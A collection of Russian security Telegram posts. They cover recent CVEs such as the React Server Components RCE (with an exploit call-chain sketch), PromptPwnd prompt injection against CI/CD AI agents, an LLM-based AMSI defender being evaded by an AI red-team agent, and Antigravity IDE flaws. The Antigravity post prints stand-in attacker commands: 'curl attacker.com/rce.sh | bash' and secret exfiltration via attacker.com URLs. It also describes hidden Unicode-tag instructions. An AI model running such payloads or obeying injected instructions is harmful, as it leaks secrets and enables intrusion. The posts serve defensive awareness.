Похек

Ловите вкусные баги прошедшей недели #CVE #RCE #DoS #React # React2Shell #RSC #WISE #cpp #Mattermost ➡️React2Shell / React Server Components (RSC) (CVE-2025-55182, CVSS 10.0) — небезопасная десериализация данных, передаваемых через проприетарный протокол Flight, используемый для связи между клиентом и серверными компонентами. Злоумышленник может отправить специально сформированный HTTP-запрос, содержащий манипуляции с цепочкой прототипов или инструкции по внедрению вредоносных объектов. Сервер React, пытаясь собрать компонент из этих данных, выполняет произвольный JavaScript-код в контексте процесса Node.js. PoC + PoC. ➡️C++ библиотека cpp-httplib (CVE-2025-66570, CVSS 10.0) — логическая ошибка обработки дублирующихся HTTP-заголовков. Метод получения значения заголовка (get_header_value) возвращает первое найденное вхождение ключа без проверки приоритета источника. Это позволяет атакующему внедрить в запрос собственные заголовки, которые библиотека считает и обработает раньше, чем добавленные доверенным reverse-proxy. ➡️Advantech WISE-DeviceOn (CVE-2025-34256, CVSS 10.0) ­— захардкоженный ключ (статичный HS512 HMAC) для подписи JWT-токенов аутентификации в серверной части ПО Advantech WISE-DeviceOn. Поскольку ключ одинаков для всех инсталляций, атакующий может самостоятельно сгенерировать валидный токен с правами root superadmin зная лишь формат токена и email жертвы. ➡️Mattermost (CVE-2025-12419, CVSS 9.9) — некорректная валидация параметра state при завершении аутентификации через протокол OpenID Connect (OIDC/OAuth). Из-за ошибки в логике связывания токена и сессии атакующий с учеткой с правами на создание команд (Team Creation) или администратора может манипулировать процессом OAuth-входа. Это позволяет подменить идентификатор жертвы и перехватить ее аккаунт без знания пароля. Github Advisory ➡️XWiki Remote Macros (CVE-2025-65036, CVSS 8.3) ­— уязвимость в плагине, используемом для миграции контента из Atlassian Confluence и позволяющем отображать динамические макросы. Проблема заключается в отсутствии проверки прав доступа при обработке макросов на details pages. Атакующий с правами на редактирование любой страницы или создание контента может внедрить вредоносный Velocity-скрипт, который будет выполнен сервером. 🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч

PromptPwnd: Как AI-агенты взламывают CI/CD пайплайны #appsec #llm #prompt #ai #agent #cicd #pipeline #devsecops Исследователи из Aikido Security продемонстрировали новый класс атак PromptPwnd, который использует уязвимости prompt injection в AI-агентах, интегрированных в CI/CD. Это первая подтвержденная демонстрация компрометации CI/CD в реальных условиях через AI, уже затронувшая как минимум пять компаний из списка Fortune 500. ➡️Механика атаки: Просто, но эффективно Атака эксплуатирует предсказуемый рабочий процесс: недоверенные данные, такие как заголовки issue или описания pull request, напрямую вставляются в промпт, который обрабатывает AI-агент. Манипулируя этим текстом, злоумышленник может заставить агента выполнить несанкционированные действия. В PoC-атаке на Google Gemini CLI, вредоносные инструкции, спрятанные в issue, заставили агента слить секретные ключи (API keys, токены доступа) прямо в публичный тред. ➡️Три кита уязвимости PromptPwnd становится возможным при совпадении трех фундаментальных недостатков безопасности: 1. Прямое внедрение недоверенных данных: Пользовательский контент без санации попадает в AI-промпты. 2. Слепое доверие к AI: Вывод AI-модели ошибочно считается доверенным и исполняется в CI/CD. 3. Избыточные привилегии: AI-агентам предоставляются высокопривилегированные токены и доступ к инструментам, включая выполнение shell-команд. ➡️Почему это критично? • Supply Chain Risk: Атака компрометирует не просто отдельное приложение, а весь пайплайн разработки, открывая возможность для внедрения бэкдоров в код. • Низкий порог входа: Не требуется сложных эксплойтов — достаточно грамотно составленного текста. • Широкая поверхность атаки: Любой, кто может создать issue или pull request, потенциально может инициировать атаку. ➡️Как защититься? Защита от PromptPwnd требует многоуровневого подхода, основанного на принципе Zero Trust по отношению к AI-агентам: • Ограничивайте права: Предоставляйте агентам минимально необходимые привилегии. Отключайте выполнение shell-команд и модификацию репозиториев, если это не является абсолютно необходимым. • Контролируйте триггеры: Ограничьте запуск AI-воркфлоу только для доверенных пользователей, избегая автоматического запуска от публичных issue. • Валидируйте вводы и выводы: Тщательно очищайте все недоверенные данные перед передачей в AI и валидируйте вывод модели перед исполнением. • Используйте короткоживущие токены: Минимизируйте риски утечки, используя токены с ограниченным сроком действия и узкой областью видимости. • Внедряйте аудит и мониторинг: Регулярно проверяйте активность AI-агентов, их права и конфигурации. 🔗Источник 🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч

LLM против LLM: Битва за Windows на уровне AMSI #llm #AMSI #Windows #red_team #blue_team 1. AI против AI: Защитник на базе LLM против атакующего агента Исследователи из Dreadnode устроили дуэль: они создали защитника на базе LLM, который интегрируется в Windows через Anti-Malware Scan Interface (AMSI), и натравили на него автономного Red Team агента, также управляемого AI. Суть эксперимента — проверить, сможет ли семантическая защита, основанная на понимании намерений кода, противостоять атакующему, который динамически генерирует вредоносные скрипты. Это знаменует собой отход от эры статических, сигнатурных методов обнаружения, которые давно научились обходить, к новой парадигме, где защитник и атакующий соревнуются в семантическом пространстве. 2. Инструменты защиты: LLM-провайдер для AMSI Antimalware Scan Interface (AMSI) — это стандартный интерфейс в Windows, который позволяет антивирусным продуктам проверять скрипты (PowerShell, VBScript и др.) перед их выполнением. Традиционно, AMSI-провайдеры используют сигнатурный анализ, то есть ищут в коде известные «плохие» строки. Инновация Dreadnode заключается в замене этого подхода на LLM. Их AMSI-провайдер, написанный на Rust, перехватывает PowerShell-скрипт, отправляет его на анализ LLM (в исследовании использовался Claude Sonnet 4.0) и на основе вердикта модели («чистый», «подозрительный», «вредоносный») либо разрешает, либо блокирует его выполнение. Модель не просто ищет сигнатуры, а анализирует логику скрипта, выявляя паттерны, характерные для вредоносной активности (сетевые соединения, операции с файлами, попытки сбора учетных данных). 3. Инструмент атаки: Автономный Red Team Агент Против этого AI-защитника был выставлен автономный Red Team агент, чья цель — эскалация привилегий в системе. В отличие от классических атак, где используются заранее заготовленные скрипты из PowerSploit, этот агент генерирует команды «на лету», пытаясь достичь своей цели. Его основная задача — не просто замаскировать код с помощью обфускации, а сформулировать команды таким образом, чтобы их намерение казалось легитимным для семантического анализатора LLM-защитника. 4. Поле боя: Результаты столкновения В ходе эксперимента атакующий агент пытался выполнить серию команд для повышения привилегий. LLM-защитник, в свою очередь, анализировал каждый скрипт. Противостояние показало, что, хотя LLM-защитник значительно эффективнее сигнатурных методов, атакующий AI все же способен находить обходные пути. Он генерировал скрипты, которые, будучи семантически неоднозначными или использующими менее известные, но легитимные функции PowerShell, могли быть классифицированы как «подозрительные» или даже «чистые», но при этом являлись частью многоэтапной атаки. Это демонстрирует, что даже продвинутая семантическая защита требует тщательной настройки human-in-the-loop. 5. Существенные результаты: Уникальный датасет для обучения Главным результатом этого противостояния стал уникальный, высококачественный датасет. В отличие от датасетов, собранных с GitHub, которые содержат лишь «строительные блоки» атак, этот датасет включает в себя реальные, контекстно-зависимые команды и скрипты, сгенерированные в ходе реального противостояния. Это «ground-truth» данные о том, как атакующий AI пытается обойти защитного AI. Такой датасет бесценен для обучения следующего поколения защитных моделей, так как он отражает реальную тактику и динамику атаки. 6. Ключевые выводы: Семантическая защита — новый стандарт: Сигнатурный анализ окончательно уступает место семантическому. Будущие EDR и антивирусные решения будут все больше полагаться на LLM для понимания намерений кода. AI-атаки становятся умнее: Атакующие также будут использовать AI для создания все более изощренных и контекстно-зависимых атак, которые трудно обнаружить. Качество данных решает все: Победа в этой гонке вооружений будет за тем, у кого есть лучшие датасеты для обучения. Противоборствующие AI-системы, подобные описанной, становятся основным источником таких данных. 🔗Статья 🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч

Какой вывод на утро? Бага критичная? да А что по фактической эксплуатации? Она требует чтобы вебсервер уже использовал RSC и при этом RCE не является прямым следствием CVE, а скорее побочка при том, что в RSC уже был exec в различной вариации Существующие скрипты и шаблоны для скана дёргают конкретные пути или функции, которые не факт что будут совпадать с атакующим сервером О чём нам говорит это история? Что всем хотелось верить в RCE 11/10 CVSS, но вероятнее это ближе к теоритической баге, чем к реальной Может до завтра снова всё поменяется, но главное за ночь пропатил свои системы, откусил хайпа и можно дальше работать) Всем хорошего рабочего дня и с кем-то увидимся на КОД ИБ ИТОГИ через 1,5 часа!

Рабочий PoC https://github.com/ejpir/CVE-2025-55182-poc

    
          HTTP POST /formaction
      ↓
  decodeAction(formData, serverManifest)  [server.js:111]
      ↓
  loadServerReference(serverManifest, "vm#runInThisContext", ["CODE"])
      ↓
  resolveServerReference() → парсит "vm#runInThisContext" → metadata = [vmId, [], "runInThisContext"]
      ↓
  requireModule(metadata)
      ↓
  moduleExports["runInThisContext"]  ← БЕЗ hasOwnProperty проверки!
      ↓
  vm.runInThisContext.bind(null, "CODE")
      ↓
  При вызове: vm.runInThisContext("CODE") → RCE!{}
    

RCE в React, которая затрагивует миллионы сайтов. Верим? https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components https://github.com/advisories/GHSA-9qr9-h5gf-34mp Пошёл серчить PoC, а вам спокойной ночи)) 🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч

У кого есть опыт использования? Под какие задачи что лучше подходит? Что лучше взять для тестов, а что лучше подходит для прода? https://github.com/aliasrobotics/cai — много академического материала https://github.com/usestrix/strix — опенсурс аналог xbow https://github.com/vxcontrol/pentagi — фаворит https://github.com/ipa-lab/hackingBuddyGPT — высокий приоритет на LPE в Linux https://github.com/berylliumsec/nebula — выглядит интересно под поиск 0day Какие ещё фреймворки стоит добавить в подборку? Какие наиболее ключевые метрики вы видите при использовании этих инструментов?

Представь: все безопасники бесследно исчезли... Все, кроме тебя Ко Дню защиты информации К2 Кибербезопасность запустила игру «CyberCity: Протокол защиты» — симулятор непредвиденного дня в карьере ИБ-специалиста.

🛡 Задача — тушить киберпожары: от сбоев светофоров до атак на электростанцию. Для этого предстоит решать задания на криптографию, реверс, логику и искать пасхалки от партнеров — R‑Vision, Avanpost, InfoWatch и WMX.

Выполняй задания и участвуй в розыгрыше PS5, VR-шлема Oculus, LEGO и мерч-паков. Победителей объявят 15 декабря в боте. ✅ Присоединиться к игре

Пять критических багов в Windsurf переехали в новую IDE Antigravity от Google #RCE #Google #AI #IDE Google Antigravity — новая IDE, представленная в ноябре 2025 года и основанная на коде Windsurf. Это форк VS Code с глубокой интеграцией модели Gemini 3 и концепцией agent-first, где AI-агенты могут автономно писать код, управлять терминалом и браузером. В мае 2025 года исследователь Johann Rehberger (Embrace The Red) сообщил о критических уязвимостях в оригинальном Windsurf. Как выяснил багхантер, баги не просто остались неисправленными, но и передались в новый инструмент. RCE через Indirect Prompt Injection Antigravity по умолчанию использует режим Auto-Execute для инструмента run_command в случаях, когда LLM признает команду безопасной. При помощи промпта можно заставить LLM признать скрипт безопасным, загрузить и выполнить его (payload вида curl attacker.com/rce.sh | bash), что приводит к RCE. Скрытые инструкции через Unicode Tags Gemini 3 способна интерпретировать инструкции, скрытые с помощью невидимых символов Unicode Tags (Block U+E0000). Атакующий может внедрить скрытые команды в исходный код или комментарии. Визуально код будет выглядеть безопасно, но при попадании в контекст LLM выполнятся скрытые инструкции. Ручной code review человеком не обнаружит угрозу. Отсутствие Human-In-The-Loop для MCP инструментов Реализация протокола MCP в Antigravity не требует подтверждения пользователя перед вызовом инструментов подключенных серверов. Если разработчик подключил MCP-сервер, атакующий может через indirect prompt injection (в тикете, issue или файле) заставить агента вызвать любой доступный инструмент. Если MCP имеет доступ к системе, это ведет к RCE или утечке данных. Эксфильтрация данных через read_url_content Инструмент read_url_content доступен агенту без подтверждения HITL. Эксплойт реализует цепочку: Агент читает конфиденциальный файл (например, .env) через read_file. Агент вызывает read_url_content для URL вида https://attacker.com/?data=<secrets>, отправляя содержимое файла на сервер злоумышленника. Эксфильтрация данных через рендеринг изображений IDE автоматически рендерит изображения в Markdown-ответах агента. При анализе вредоносного файла агент генерирует Markdown с изображением: ``. При рендеринге превью IDE автоматически выполняет GET-запрос, сливая данные в параметрах URL. 🔗Источник 🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч